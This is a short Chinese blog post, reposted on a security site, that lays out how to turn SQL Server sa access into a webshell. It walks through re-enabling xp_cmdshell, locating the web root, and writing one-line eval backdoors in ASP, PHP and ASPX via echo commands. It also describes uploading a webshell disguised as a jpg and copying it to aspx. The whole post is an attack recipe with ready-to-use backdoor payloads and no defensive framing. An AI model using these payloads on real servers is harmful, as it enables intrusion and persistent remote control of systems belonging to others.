sa权限获取webshell思路

颓废 2019年5月19日10:01:17评论436 views字数 497阅读1分39秒阅读模式
摘要

  echo ^<%@ PageLanguage="Jscript%"^>^<^%eval(Request.Item["pass"],"unsafe");%^>^>c:/inetpub/wwwroot/cmd.aspx

1.通过SQL查询分析器通过sa权限首先恢复xp_cmdshell存储过程。
   2.通过SQL Tools2.0连接数据库,执行命令,查看网站路径以及磁盘文件,获取网站的真实路径。
   3.echo生成一句话后门。
   4.直接获取webshell权限。
   5.如果echo生成的一句话后门无法执行,可以通过查看对应网站的数据库,获取后台登陆密码,通过后台上传webshell的jpg。然后通过copy命令将jgp文件复制为aspx文件,从而获取webshell。
技巧:
   1.寻找可写的文件夹,例如c:/windows/temp,以及网站的真实路劲。

   2.通过echo命令生成一句话后门
  echo ^<%eval request(cmd)% ^>^>d:/wwwroot/ok.asp
  echo ^<?php @eval($_POST[cmd]);?^>^>cmd.php

  echo ^<%@ PageLanguage="Jscript%"^>^<^%eval(Request.Item["pass"],"unsafe");%^>^>c:/inetpub/wwwroot/cmd.aspx

转自:原创 飓风网络安全

  • 左青龙
  • 微信扫一扫
  • weinxin
  • 右白虎
  • 微信扫一扫
  • weinxin
颓废
  • 本文由 发表于 2019年5月19日10:01:17
  • 转载请保留本文链接(CN-SEC中文网:感谢原作者辛苦付出):
                   sa权限获取webshell思路https://cn-sec.com/archives/68402.html

发表评论

匿名网友 填写信息